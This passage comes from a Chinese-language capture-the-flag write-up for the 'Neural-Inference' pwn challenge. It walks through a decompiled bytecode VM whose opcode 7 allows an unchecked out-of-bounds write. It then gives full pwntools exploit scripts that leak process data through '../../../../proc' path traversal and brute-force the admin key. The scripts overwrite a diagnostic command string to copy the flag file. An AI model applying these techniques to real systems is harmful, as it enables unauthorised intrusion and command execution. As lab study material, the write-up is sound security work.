  unsigned __int8 index2; // [rsp+2Bh] [rbp-65h]
  int v37; // [rsp+2Ch] [rbp-64h]
  _DWORD s[16]; // [rsp+30h] [rbp-60h] BYREF
  unsigned int start_src_length; // [rsp+70h] [rbp-20h]
  int n123; // [rsp+74h] [rbp-1Ch]
  __int64 src_1; // [rsp+78h] [rbp-18h]
  unsigned int src_length_1; // [rsp+80h] [rbp-10h]
  unsigned __int64 v43; // [rsp+88h] [rbp-8h]

  v43 = __readfsqword(0x28u);
  memset(s, 0, 0x58u);
  src_1 = (__int64)src;
  src_length_1 = src_length;
  n123 = -1;
  engine_log("VNM: Starting execution (%u bytes)", src_length, v2, v3, v4, v5);
  while ( 1 )
  {
    if ( start_src_length >= src_length_1 )
      return 0;
    start_src_length_1 = start_src_length;
    v9 = ++start_src_length;
    choice = *(_BYTE *)(src_1 + start_src_length_1);
    if ( choice > 8u )
      break;
    if ( !choice )
      goto LABEL_45;
    switch ( choice )
    {
      case 1u:                                  // [choice][index1][index2][index3][value]
        if ( src_length_1 < start_src_length + 2 )
          return 0xFFFFFFFFLL;
        v11 = start_src_length++;
        index1 = *(_BYTE *)(src_1 + v11);
        v12 = start_src_length++;
        index2 = *(_BYTE *)(src_1 + v12);
        if ( index1 <= 0xFu && index2 <= 0xFu )
          s[index1] = s[index2];                // 交换
        continue;
      case 2u:
        if ( src_length_1 < start_src_length + 5 )
          return 0xFFFFFFFFLL;
        v13 = start_src_length++;
        index3 = *(_BYTE *)(src_1 + v13);
        v37 = *(_DWORD *)(start_src_length + src_1);
        start_src_length += 4;
        if ( index3 <= 0xFu )
          s[index3] = v37;                      // 直接赋值
        continue;
      case 3u:
        if ( src_length_1 < start_src_length + 2 )
          return 0xFFFFFFFFLL;
        v14 = start_src_length++;
        n0xF_3 = *(_BYTE *)(src_1 + v14);
        v15 = start_src_length++;
        index4 = *(_BYTE *)(src_1 + v15);
        if ( n0xF_3 <= 0xFu && index4 <= 0xFu )
          s[n0xF_3] += s[index4];               // add
        continue;
      case 4u:
        if ( src_length_1 < start_src_length + 2 )
          return 0xFFFFFFFFLL;
        v16 = start_src_length++;
        index5 = *(_BYTE *)(src_1 + v16);
        v17 = start_src_length++;
        index6 = *(_BYTE *)(src_1 + v17);
        if ( index5 <= 0xFu && index6 <= 0xFu )
          s[index5] -= s[index6];               // sub
        continue;
      case 5u:
        if ( src_length_1 < start_src_length + 1 )
          return 0xFFFFFFFFLL;
        v18 = start_src_length++;
        index7 = *(_BYTE *)(src_1 + v18);
        if ( index7 <= 0xFu && n123 <= 123 )
        {
          n123 += 4;
          *(_DWORD *)&g_pwn[n123 + 144] = s[index7];// 将s中的值赋值给g_pwn
        }
        continue;
      case 6u:
        if ( src_length_1 < start_src_length + 1 )
          return 0xFFFFFFFFLL;
        v19 = start_src_length++;
        index8 = *(_BYTE *)(src_1 + v19);
        if ( index8 <= 0xFu && n123 >= 0 )
        {
          s[index8] = *(_DWORD *)&g_pwn[n123 + 144];// 从g_pwn处赋值给s
          n123 -= 4;
        }
        continue;
      case 7u:
        if ( src_length_1 < start_src_length + 2 )
          return 0xFFFFFFFFLL;
        v20 = start_src_length++;
        v26 = *(_BYTE *)(src_1 + v20);
        v21 = start_src_length++;
        index9 = *(_BYTE *)(src_1 + v21);
        if ( index9 <= 0xFu )
          *(_DWORD *)&g_pwn[v26 + 144] = s[index9];// 没有校验,存在任意命令的控制
        continue;
      case 8u:                                  // 需要将这里的操作无害化
        if ( src_length_1 < start_src_length + 2 )
          return 0xFFFFFFFFLL;
        v22 = start_src_length++;
        index10 = *(_BYTE *)(src_1 + v22);
        v23 = start_src_length++;
        if ( index10 <= 0xFu )
          s[index10] = *(_DWORD *)&g_pwn[*(char *)(src_1 + v23) + 144];
        break;
      default:
        goto LABEL_45;
    }
  }
  if ( choice == 0xFF )
  {
    engine_log("VNM: Halted", src_length, v9, src_1, v6, v7);
    return 0;
  }
  else
  {
LABEL_45:
    engine_log("VNM: Unknown opcode 0x%02x at PC=%u", choice, start_src_length - 1, src_1, v6, v7);
    return 0xFFFFFFFFLL;
  }
}

不妨让每一条命令都从头开始执行,反正就算你提前执行完case7处的赋值操作,也需要后续再执行完一次case1才能实现完整的控制。

所以我们的需要控制每一次的命令就是:

[choice=1][index1][index2][index3][value][index4][index5][index6][index7][index9][index10][index11][index11][index12]

该命令依次执行下面的操作:

s[index1]=s[index2];
s[index3]=value
s[index4]=s[index4]+s[index5]
s[index6]=s[index6]-s[index7]
g_pwn[n123 + 144]=s[index8]
s[index9]=g_pwn[n123 + 144]
g_pwn[index10+0x90]=s[index11]
s[index12]=g_pwn[index13+0x90]

attack

ok,依据上面的分析,我们来进行攻击

先让ai写个交互的板子:

import base64
import hashlib
import json
import struct
import time

from pwn import context, remote


CMD_NEW_SESSION = 0x01
CMD_CHAT = 0x02
CMD_LIST_SESSIONS = 0x03
CMD_EXPORT = 0x04
CMD_UPLOAD_KNOW = 0x06
CMD_LIST_KNOW = 0x07
CMD_MODEL_INFO = 0x08
CMD_STATUS = 0x09
CMD_ADMIN = 0xFF


context.log_level = 'debug'


SBOX = bytes([
	99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118,
	202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192,
	183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21,
	4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117,
	9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132,
	83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207,
	208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168,
	81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210,
	205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115,
	96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219,
	224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121,
	231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8,
	186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138,
	112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158,
	225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223,
	140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22,
])


def u32(value):
	return value & 0xFFFFFFFF


def derive_admin_key(pid, start_time):
	state = u32((0x045D9F3B * pid) ^ (0x119DE1F3 * start_time))
	output = bytearray()
	for index in range(16):
		state ^= u32(state << 13)
		state ^= state >> 7
		state ^= u32(state << 17)
		output.append(SBOX[state & 0xFF])
		state = u32(state + u32(0x9E3779B9 * (index + 1)))
	return bytes(output)


def build_admin_token(timestamp, sub_cmd, data, admin_key):
	digest = hashlib.sha256()
	digest.update(struct.pack('<I', timestamp))
	digest.update(bytes([sub_cmd]))
	digest.update(data)
	digest.update(admin_key)
	return digest.digest()


def build_admin_payload(timestamp, sub_cmd, data, admin_key):
	token = build_admin_token(timestamp, sub_cmd, data, admin_key)
	return struct.pack('<I', timestamp) + token + bytes([sub_cmd]) + data


class NeuralChatClient:
	def __init__(self, host='127.0.0.1', port=5000):
		self.host = host
		self.port = port

	def _recv_http_response(self, tube):
		header = tube.recvuntil(b'\r\n\r\n')
		header_text = header.decode(errors='replace')
		lines = header_text.split('\r\n')
		status_line = lines[0]
		status_code = int(status_line.split()[1])

		content_length = 0
		is_chunked = False
		for line in lines[1:]:
			if not line:
				continue
			name, _, value = line.partition(':')
			lower_name = name.strip().lower()
			lower_value = value.strip().lower()
			if lower_name == 'content-length':
				content_length = int(value.strip())
			elif lower_name == 'transfer-encoding' and 'chunked' in lower_value:
				is_chunked = True

		if is_chunked:
			body = bytearray()
			while True:
				chunk_size_line = tube.recvline().strip()
				chunk_size = int(chunk_size_line.split(b';', 1)[0], 16)
				if chunk_size == 0:
					tube.recvuntil(b'\r\n')
					break
				body.extend(tube.recvn(chunk_size))
				tube.recvuntil(b'\r\n')
			return status_code, bytes(body)

		body = tube.recvn(content_length) if content_length else b''
		return status_code, body

	def _http(self, method, path, body=b'', headers=None):
		if headers is None:
			headers = {}
		request_headers = {
			'Host': f'{self.host}:{self.port}',
			'Connection': 'close',
			'Content-Length': str(len(body)),
		}
		request_headers.update(headers)

		request = [f'{method} {path} HTTP/1.1']
		for key, value in request_headers.items():
			request.append(f'{key}: {value}')
		raw_request = '\r\n'.join(request).encode() + b'\r\n\r\n' + body

		tube = remote(self.host, self.port)
		tube.send(raw_request)
		status_code, response_body = self._recv_http_response(tube)
		tube.close()
		return status_code, response_body

	def _json(self, method, path, payload=None):
		body = b''
		headers = {}
		if payload is not None:
			body = json.dumps(payload).encode()
			headers['Content-Type'] = 'application/json'
		status_code, response_body = self._http(method, path, body=body, headers=headers)
		if status_code >= 400:
			raise RuntimeError(f'http {status_code}: {response_body.decode(errors="replace")}')
		if not response_body:
			return None
		return json.loads(response_body.decode())

	def _multipart(self, path, field_name, filename, content):
		boundary = f'----pwntools-{int(time.time() * 1000)}'
		body = bytearray()
		body.extend(f'--{boundary}\r\n'.encode())
		body.extend(
			f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'.encode()
		)
		body.extend(b'Content-Type: application/octet-stream\r\n\r\n')
		body.extend(content)
		body.extend(f'\r\n--{boundary}--\r\n'.encode())
		status_code, response_body = self._http(
			'POST',
			path,
			body=bytes(body),
			headers={'Content-Type': f'multipart/form-data; boundary={boundary}'},
		)
		if status_code >= 400:
			raise RuntimeError(f'http {status_code}: {response_body.decode(errors="replace")}')
		return json.loads(response_body.decode())

	def status(self):
		return self._json('GET', '/api/status')

	def new_session(self):
		return self._json('POST', '/api/session/new', {})['session_id']

	def chat(self, session_id, message):
		return self._json('POST', '/api/chat', {'session_id': session_id, 'message': message})

	def list_sessions(self):
		return self._json('GET', '/api/sessions')

	def export_session(self, session_id):
		return self._json('POST', '/api/export', {'session_id': session_id})

	def upload_knowledge(self, filename, content):
		return self._multipart('/api/knowledge/upload', 'file', filename, content)

	def list_knowledge(self):
		return self._json('GET', '/api/knowledge/list')

	def model_info(self):
		return self._json('GET', '/api/model/info')

	def raw(self, command, payload=b''):
		body = base64.b64encode(bytes([command]) + payload).decode()
		result = self._json('POST', '/api/raw', {'data': body})
		if 'data' not in result:
			raise RuntimeError(result)
		decoded = base64.b64decode(result['data'])
		if not decoded:
			raise RuntimeError('empty raw response')
		return decoded[0], decoded[1:]

	def admin(self, sub_cmd, data=b'', timestamp=None, admin_key=None):
		if timestamp is None:
			timestamp = int(time.time())
		if admin_key is None:
			status = self.status()
			pid = int(status['pid'])
			start_time = int(time.time() - status['uptime'])
			admin_key = derive_admin_key(pid, start_time)
		payload = build_admin_payload(timestamp, sub_cmd, data, admin_key)
		return self.raw(CMD_ADMIN, payload)


def demo():
	client = NeuralChatClient()

	status = client.status()
	print('[*] status =', json.dumps(status, ensure_ascii=False))

	session_id = client.new_session()
	print(f'[*] new session id = {session_id}')

	reply = client.chat(session_id, 'hello')
	print('[*] chat =', json.dumps(reply, ensure_ascii=False))

	model = client.model_info()
	print('[*] model =', json.dumps(model, ensure_ascii=False))

	raw_status, raw_data = client.raw(CMD_STATUS)
	print(f'[*] raw status = {raw_status:#x}')
	print(f'[*] raw data = {raw_data.decode(errors="replace")}')


if __name__ == '__main__':
	demo()

效果如下

[+] Opening connection to 127.0.0.1 on port 5000: Done
[DEBUG] Sent 0x58 bytes:
    b'GET /api/status HTTP/1.1\r\n'
    b'Host: 127.0.0.1:5000\r\n'
    b'Connection: close\r\n'
    b'Content-Length: 0\r\n'
    b'\r\n'
[DEBUG] Received 0xa6 bytes:
    b'HTTP/1.1 200 OK\r\n'
    b'Server: Werkzeug/3.1.7 Python/3.10.12\r\n'
    b'Date: Fri, 27 Mar 2026 02:44:39 GMT\r\n'
    b'Content-Type: application/json\r\n'
    b'Content-Length: 90\r\n'
    b'Connection: close\r\n'
    b'\r\n'
[DEBUG] Received 0x5a bytes:
    b'{"model_loaded":1,"pid":7,"sessions":0,"status":"running","uptime":691,"version":"2.1.0"}\n'
[*] Closed connection to 127.0.0.1 port 5000
[*] status = {"model_loaded": 1, "pid": 7, "sessions": 0, "status": "running", "uptime": 691, "version": "2.1.0"}
[+] Opening connection to 127.0.0.1 on port 5000: Done
[DEBUG] Sent 0x80 bytes:
    b'POST /api/session/new HTTP/1.1\r\n'
    b'Host: 127.0.0.1:5000\r\n'
    b'Connection: close\r\n'
    b'Content-Length: 2\r\n'
    b'Content-Type: application/json\r\n'
    b'\r\n'
    b'{}'
[DEBUG] Received 0xb7 bytes:
    b'HTTP/1.1 200 OK\r\n'
    b'Server: Werkzeug/3.1.7 Python/3.10.12\r\n'
    b'Date: Fri, 27 Mar 2026 02:44:39 GMT\r\n'
    b'Content-Type: application/json\r\n'
    b'Content-Length: 17\r\n'
    b'Connection: close\r\n'
    b'\r\n'
    b'{"session_id":1}\n'
[*] Closed connection to 127.0.0.1 port 5000
[*] new session id = 1
[+] Opening connection to 127.0.0.1 on port 5000: Done
[DEBUG] Sent 0x9d bytes:
    b'POST /api/chat HTTP/1.1\r\n'
    b'Host: 127.0.0.1:5000\r\n'
    b'Connection: close\r\n'
    b'Content-Length: 37\r\n'
    b'Content-Type: application/json\r\n'
    b'\r\n'
    b'{"session_id": 1, "message": "hello"}'
[DEBUG] Received 0x11d bytes:
    b'HTTP/1.1 200 OK\r\n'
    b'Server: Werkzeug/3.1.7 Python/3.10.12\r\n'
    b'Date: Fri, 27 Mar 2026 02:44:39 GMT\r\n'
    b'Content-Type: application/json\r\n'
    b'Content-Length: 118\r\n'
    b'Connection: close\r\n'
    b'\r\n'
    b'{"response":"Hello! I\'m NeuralChat, your AI assistant powered by the NeuralChat-7B model. How can I help you today?"}\n'
[*] Closed connection to 127.0.0.1 port 5000
[*] chat = {"response": "Hello! I'm NeuralChat, your AI assistant powered by the NeuralChat-7B model. How can I help you today?"}
[+] Opening connection to 127.0.0.1 on port 5000: Done
[DEBUG] Sent 0x5c bytes:
    b'GET /api/model/info HTTP/1.1\r\n'
    b'Host: 127.0.0.1:5000\r\n'
    b'Connection: close\r\n'
    b'Content-Length: 0\r\n'
    b'\r\n'
[DEBUG] Received 0x130 bytes:
    b'HTTP/1.1 200 OK\r\n'
    b'Server: Werkzeug/3.1.7 Python/3.10.12\r\n'
    b'Date: Fri, 27 Mar 2026 02:44:39 GMT\r\n'
    b'Content-Type: application/json\r\n'
    b'Content-Length: 137\r\n'
    b'Connection: close\r\n'
    b'\r\n'
    b'{"author":"NeuralChat Team","data_size":256,"description":"Conversational AI model","loaded":1,"name":"neuralchat-7b","version":"2.1.0"}\n'
[*] Closed connection to 127.0.0.1 port 5000
[*] model = {"author": "NeuralChat Team", "data_size": 256, "description": "Conversational AI model", "loaded": 1, "name": "neuralchat-7b", "version": "2.1.0"}
[+] Opening connection to 127.0.0.1 on port 5000: Done
[DEBUG] Sent 0x87 bytes:
    b'POST /api/raw HTTP/1.1\r\n'
    b'Host: 127.0.0.1:5000\r\n'
    b'Connection: close\r\n'
    b'Content-Length: 16\r\n'
    b'Content-Type: application/json\r\n'
    b'\r\n'
    b'{"data": "CQ=="}'
[DEBUG] Received 0x12b bytes:
    b'HTTP/1.1 200 OK\r\n'
    b'Server: Werkzeug/3.1.7 Python/3.10.12\r\n'
    b'Date: Fri, 27 Mar 2026 02:44:39 GMT\r\n'
    b'Content-Type: application/json\r\n'
    b'Content-Length: 132\r\n'
    b'Connection: close\r\n'
    b'\r\n'
    b'{"data":"AHsic3RhdHVzIjoicnVubmluZyIsInBpZCI6NywidXB0aW1lIjo2OTEsInNlc3Npb25zIjoxLCJtb2RlbF9sb2FkZWQiOjEsInZlcnNpb24iOiIyLjEuMCJ9"}\n'
[*] Closed connection to 127.0.0.1 port 5000
[*] raw status = 0x0
[*] raw data = {"status":"running","pid":7,"uptime":691,"sessions":1,"model_loaded":1,"version":"2.1.0"}

攻击脚本ai搓的,交互写不来说是,其实是我太菜了

import base64
import calendar
import hashlib
import json
import struct
import time
from email.utils import parsedate_to_datetime

from pwn import context, remote


CMD_NEW_SESSION = 0x01
CMD_CHAT = 0x02
CMD_LIST_SESSIONS = 0x03
CMD_EXPORT = 0x04
CMD_UPLOAD_KNOW = 0x06
CMD_LIST_KNOW = 0x07
CMD_MODEL_INFO = 0x08
CMD_STATUS = 0x09
CMD_ADMIN = 0xFF


context.log_level = 'debug'


SBOX = bytes([
	99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118,
	202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192,
	183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21,
	4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117,
	9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132,
	83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207,
	208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168,
	81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210,
	205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115,
	96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219,
	224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121,
	231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8,
	186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138,
	112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158,
	225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223,
	140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22,
])


def u32(value):
	return value & 0xFFFFFFFF


def derive_admin_key(pid, start_time):
	state = u32((0x045D9F3B * pid) ^ (0x119DE1F3 * start_time))
	output = bytearray()
	for index in range(16):
		state ^= u32(state << 13)
		state ^= state >> 7
		state ^= u32(state << 17)
		output.append(SBOX[state & 0xFF])
		state = u32(state + u32(0x9E3779B9 * (index + 1)))
	return bytes(output)


def build_admin_token(timestamp, sub_cmd, data, admin_key):
	digest = hashlib.sha256()
	digest.update(struct.pack('<I', timestamp))
	digest.update(bytes([sub_cmd]))
	digest.update(data)
	digest.update(admin_key)
	return digest.digest()


def build_admin_payload(timestamp, sub_cmd, data, admin_key):
	token = build_admin_token(timestamp, sub_cmd, data, admin_key)
	# Layout expected by engine:
	# [0:4] timestamp, [4] sub_cmd, [5:37] token, [37:] data
	return struct.pack('<I', timestamp) + bytes([sub_cmd]) + token + data


class NeuralChatClient:
	def __init__(self, host='127.0.0.1', port=5000):
		self.host = host
		self.port = port

	def _recv_http_response(self, tube):
		header = tube.recvuntil(b'\r\n\r\n')
		header_text = header.decode(errors='replace')
		lines = header_text.split('\r\n')
		status_line = lines[0]
		status_code = int(status_line.split()[1])
		headers = {}

		content_length = 0
		is_chunked = False
		for line in lines[1:]:
			if not line:
				continue
			name, _, value = line.partition(':')
			lower_name = name.strip().lower()
			lower_value = value.strip().lower()
			headers[lower_name] = value.strip()
			if lower_name == 'content-length':
				content_length = int(value.strip())
			elif lower_name == 'transfer-encoding' and 'chunked' in lower_value:
				is_chunked = True

		if is_chunked:
			body = bytearray()
			while True:
				chunk_size_line = tube.recvline().strip()
				chunk_size = int(chunk_size_line.split(b';', 1)[0], 16)
				if chunk_size == 0:
					tube.recvuntil(b'\r\n')
					break
				body.extend(tube.recvn(chunk_size))
				tube.recvuntil(b'\r\n')
			return status_code, headers, bytes(body)

		body = tube.recvn(content_length) if content_length else b''
		return status_code, headers, body

	def _http(self, method, path, body=b'', headers=None):
		if headers is None:
			headers = {}
		request_headers = {
			'Host': f'{self.host}:{self.port}',
			'Connection': 'close',
			'Content-Length': str(len(body)),
		}
		request_headers.update(headers)

		request = [f'{method} {path} HTTP/1.1']
		for key, value in request_headers.items():
			request.append(f'{key}: {value}')
		raw_request = '\r\n'.join(request).encode() + b'\r\n\r\n' + body

		tube = remote(self.host, self.port)
		tube.send(raw_request)
		status_code, response_headers, response_body = self._recv_http_response(tube)
		tube.close()
		return status_code, response_headers, response_body

	def _json(self, method, path, payload=None):
		body = b''
		headers = {}
		if payload is not None:
			body = json.dumps(payload).encode()
			headers['Content-Type'] = 'application/json'
		status_code, _, response_body = self._http(method, path, body=body, headers=headers)
		if status_code >= 400:
			raise RuntimeError(f'http {status_code}: {response_body.decode(errors="replace")}')
		if not response_body:
			return None
		return json.loads(response_body.decode())

	def _json_with_headers(self, method, path, payload=None):
		body = b''
		headers = {}
		if payload is not None:
			body = json.dumps(payload).encode()
			headers['Content-Type'] = 'application/json'
		status_code, response_headers, response_body = self._http(method, path, body=body, headers=headers)
		if status_code >= 400:
			raise RuntimeError(f'http {status_code}: {response_body.decode(errors="replace")}')
		data = None if not response_body else json.loads(response_body.decode())
		return data, response_headers

	def _text(self, method, path):
		status_code, _, response_body = self._http(method, path)
		if status_code >= 400:
			raise RuntimeError(f'http {status_code}: {response_body.decode(errors="replace")}')
		return response_body

	def _multipart(self, path, field_name, filename, content):
		boundary = f'----pwntools-{int(time.time() * 1000)}'
		body = bytearray()
		body.extend(f'--{boundary}\r\n'.encode())
		body.extend(
			f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'.encode()
		)
		body.extend(b'Content-Type: application/octet-stream\r\n\r\n')
		body.extend(content)
		body.extend(f'\r\n--{boundary}--\r\n'.encode())
		status_code, _, response_body = self._http(
			'POST',
			path,
			body=bytes(body),
			headers={'Content-Type': f'multipart/form-data; boundary={boundary}'},
		)
		if status_code >= 400:
			raise RuntimeError(f'http {status_code}: {response_body.decode(errors="replace")}')
		return json.loads(response_body.decode())

	def status(self):
		return self._json('GET', '/api/status')

	def status_with_server_time(self):
		data, headers = self._json_with_headers('GET', '/api/status')
		date_hdr = headers.get('date')
		if not date_hdr:
			raise RuntimeError('server Date header missing')
		dt = parsedate_to_datetime(date_hdr)
		server_ts = calendar.timegm(dt.utctimetuple())
		return data, server_ts

	def new_session(self):
		return self._json('POST', '/api/session/new', {})['session_id']

	def chat(self, session_id, message):
		return self._json('POST', '/api/chat', {'session_id': session_id, 'message': message})

	def list_sessions(self):
		return self._json('GET', '/api/sessions')

	def export_session(self, session_id):
		return self._json('POST', '/api/export', {'session_id': session_id})

	def upload_knowledge(self, filename, content):
		return self._multipart('/api/knowledge/upload', 'file', filename, content)

	def list_knowledge(self):
		return self._json('GET', '/api/knowledge/list')

	def model_info(self):
		return self._json('GET', '/api/model/info')

	def download(self, filename):
		return self._text('GET', f'/api/download?file={filename}')

	def raw(self, command, payload=b''):
		body = base64.b64encode(bytes([command]) + payload).decode()
		result = self._json('POST', '/api/raw', {'data': body})
		if 'data' not in result:
			raise RuntimeError(result)
		decoded = base64.b64decode(result['data'])
		if not decoded:
			raise RuntimeError('empty raw response')
		return decoded[0], decoded[1:]

	def admin(self, sub_cmd, data=b'', timestamp=None, admin_key=None):
		if timestamp is None:
			timestamp = int(time.time())
		if admin_key is None:
			status = self.status()
			pid = int(status['pid'])
			start_time = int(time.time() - status['uptime'])
			admin_key = derive_admin_key(pid, start_time)
		payload = build_admin_payload(timestamp, sub_cmd, data, admin_key)
		return self.raw(CMD_ADMIN, payload)


def p32(x):
	return struct.pack('<I', x & 0xFFFFFFFF)


def chunk_dwords(data):
	if len(data) % 4:
		data += b'\x00' * (4 - (len(data) % 4))
	return [struct.unpack('<I', data[i:i + 4])[0] for i in range(0, len(data), 4)]


def build_vnm_arbitrary_write(g_pwn_addr, writes):
	"""
	writes: list[(addr, dword)]
	利用 opcode 2 + opcode 7:
	- op2: load imm32 -> reg
	- op7: write reg -> g_pwn[0x90 + signed_offset]
	"""
	code = bytearray()
	reg = 0
	for addr, value in writes:
		offset = addr - (g_pwn_addr + 0x90)
		if not (-0x80 <= offset <= 0x7F):
			raise ValueError(f'offset out of i8 range: addr={hex(addr)}, off={offset}')
		code += bytes([0x02, reg]) + p32(value)
		code += bytes([0x07, offset & 0xFF, reg])
		reg = (reg + 1) & 0x0F
	code += b'\xff'
	return bytes(code)


def find_working_admin_key(client, window=8):
	st, server_now = client.status_with_server_time()
	pid = int(st['pid'])
	uptime = int(st['uptime'])
	approx_start = int(server_now - uptime)
	print(f'[*] PID={pid}, uptime={uptime}, server_now={server_now}, approx_start={approx_start}')

	# Prefer exact process start time leaked from /proc via path traversal.
	proc_start = None
	try:
		stat_raw = client.download(f'../../../../proc/{pid}/stat').decode(errors='replace').strip()
		proc_stat = client.download('../../../../proc/stat').decode(errors='replace')
		parts = stat_raw.split()
		if len(parts) > 21:
			start_ticks = int(parts[21])
			btime = None
			for line in proc_stat.splitlines():
				if line.startswith('btime '):
					btime = int(line.split()[1])
					break
			if btime is not None:
				hz = 100
				proc_start = int(btime + (start_ticks // hz))
				print(f'[*] /proc leak: btime={btime}, start_ticks={start_ticks}, start={proc_start}')
	except Exception as exc:
		print(f'[!] /proc leak failed, fallback to uptime brute: {exc}')

	if proc_start is not None:
		for delta in range(-4, 5):
			candidate_start = proc_start + delta
			key = derive_admin_key(pid, candidate_start)
			for tskew in range(-5, 6):
				timestamp = int(server_now + tskew)
				status, data = client.admin(0x01, b'', timestamp=timestamp, admin_key=key)
				if status == 0:
					print(f'[+] admin key ok (/proc), delta={delta}, tskew={tskew}, start={candidate_start}')
					print(f'[+] admin info = {data.decode(errors="replace")}')
					return key

	for delta in range(-window, window + 1):
		candidate_start = approx_start + delta
		key = derive_admin_key(pid, candidate_start)
		for tskew in range(-5, 6):
			timestamp = int(server_now + tskew)
			status, data = client.admin(0x01, b'', timestamp=timestamp, admin_key=key)
			if status == 0:
				print(f'[+] admin key ok, delta={delta}, tskew={tskew}, start={candidate_start}')
				print(f'[+] admin info = {data.decode(errors="replace")}')
				return key
	return None


def exploit_get_flag(client):
	# 来自 IDA:
	# g_pwn = 0x9440
	# diag command string = 0x9450
	g_pwn_addr = 0x9440
	diag_cmd_addr = 0x9450

	admin_key = find_working_admin_key(client)
	if admin_key is None:
		print('[-] failed to recover admin key')
		return None

	# Rewrite diagnostic command to copy flag into web-downloadable path.
	cmd = b'cp /home/ctf/flag /opt/neuralchat/downloads/f&&chmod 644 /opt/neuralchat/downloads/f\x00'
	dwords = chunk_dwords(cmd)
	writes = [(diag_cmd_addr + i * 4, dwords[i]) for i in range(len(dwords))]
	vnm = build_vnm_arbitrary_write(g_pwn_addr, writes)
	print(f'[*] vnm bytes = {len(vnm)}, dword writes = {len(writes)}')

	status, data = client.admin(0x05, vnm, admin_key=admin_key)
	print(f'[*] admin cmd5 status={status}, msg={data.decode(errors="replace")}')
	if status != 0:
		return None

	flag = client.download('f')
	return flag


def main():
	client = NeuralChatClient()
	status = client.status()
	print('[*] status =', json.dumps(status, ensure_ascii=False))

	flag = exploit_get_flag(client)
	if flag is None:
		print('[-] exploit failed')
		return

	print('[+] flag:')
	print(flag.decode(errors='replace'))


if __name__ == '__main__':
	main()

····


数字中国-pwn-Neural-Inference
https://a1b2rt.cn//archives/shu-zi-zhong-guo-pwn-neural-inference
作者
A1b2rt
发布于
2026年03月27日
许可协议